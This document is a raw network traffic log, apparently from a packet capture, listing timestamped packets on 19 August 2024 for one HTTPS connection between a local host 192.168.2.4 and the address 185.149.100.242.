Aug 19, 2024 09:28:40.856046915 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856070995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856203079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.856203079 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.856211901 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856245041 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856259108 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856288910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.856296062 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.856314898 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.856982946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857006073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857064962 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.857073069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857466936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857482910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857512951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.857522011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.857548952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.890228033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.890259027 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.890422106 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.890451908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.890465021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.934823036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.944056034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.944080114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.944113970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.944164038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.944220066 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.944240093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.944375038 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.947578907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.947599888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.947659969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.947674036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.948630095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.948652983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.948682070 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.948692083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.948720932 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.949253082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.949275017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.949337006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.949345112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953095913 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953120947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953167915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.953177929 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953188896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953205109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.953206062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.953249931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.953258038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.982871056 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.982901096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:40.983000994 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:40.983025074 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.028537035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.036887884 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.036911011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.036957026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.037014008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.037028074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.037041903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.037106991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.040226936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.040246010 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.040296078 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.040311098 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041137934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041162014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041198969 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.041207075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041229963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.041898966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041917086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041944981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.041953087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.041970015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.045784950 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.045809984 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.045864105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.045876980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.045897007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.045960903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.045977116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.046005011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.046013117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.046026945 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.075912952 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.075942039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.075989008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.076006889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.076025963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.122445107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.134538889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.134567022 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.134674072 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.134690046 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.134733915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.135241032 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.135262966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.135305882 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.135314941 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.135345936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137159109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137181044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137218952 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137226105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137250900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137271881 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137650013 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137671947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137705088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137712955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.137734890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.137752056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.139199018 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.139216900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.139275074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.139285088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.139313936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.140393019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.140410900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.140456915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.140463114 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.140492916 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.168004036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168024063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168118954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.168134928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168170929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.168183088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168198109 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168258905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.168258905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.168267012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.168299913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228184938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228210926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228255987 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228275061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228287935 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228326082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228634119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228653908 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228682041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228689909 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.228714943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.228732109 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.229924917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.229943991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.229993105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.230003119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.230036974 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.230325937 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.230340958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.230380058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.230386019 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.230417013 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.231645107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.231664896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.231703043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.231709003 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.231729984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.231748104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.233061075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.233077049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.233134031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.233143091 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.233181000 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.260927916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.260958910 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.261004925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.261008978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.261028051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.261045933 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.261053085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.261056900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.261090040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.261105061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.261135101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.323622942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.323648930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.323776007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.323803902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.323846102 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.326153040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.326172113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.326246023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.326265097 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.326307058 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.327107906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327131033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327178001 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.327184916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327213049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.327605009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327620983 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327655077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.327662945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.327686071 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.327704906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.328166962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.328183889 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.328214884 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.328221083 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.328255892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.328845978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.329066038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.329082012 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.329149008 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.329158068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.329196930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.355118990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.355140924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.355284929 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.355309963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.355360985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.357189894 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.357208014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.357270956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.357289076 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.357326031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.417160034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.417185068 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.417278051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.417303085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.417342901 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.419047117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419066906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419172049 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.419178009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419217110 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.419682980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419698000 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419753075 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.419759989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.419795036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.420106888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.420124054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.420165062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.420172930 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.420197010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.420213938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.420876980 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.420897961 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.420955896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.420963049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.421001911 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.421514034 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.421530008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.421575069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.421583891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.421610117 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.421627998 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.423022985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.450412989 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.450433016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.450572014 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.450608015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.450650930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.450949907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.450965881 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.451006889 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.451015949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.451049089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.509769917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.509793043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.509917021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.509951115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.509989023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.511390924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.511414051 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.511456966 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.511468887 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.511498928 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512314081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512331963 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512367010 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512376070 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512398005 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512413979 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512860060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512881994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512916088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512923956 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.512948990 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.512965918 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.513501883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.513533115 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.513576031 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.513583899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.513616085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.514180899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.514213085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.514245033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.514250994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.514267921 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.514285088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.522242069 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.542911053 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.542937040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.542978048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.542989016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.543009043 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.543026924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.543535948 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.543560028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.543592930 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.543601036 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.543616056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.543632984 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.602458954 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.602500916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.602611065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.602633953 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.602674007 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.604691029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.604721069 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.604775906 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.604785919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.604826927 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.604963064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.604980946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.605017900 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.605024099 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.605047941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.605066061 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:41.605416059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.605432987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:41.605468988 CEST	49759	443	192.168.2.4	185.149.100.242
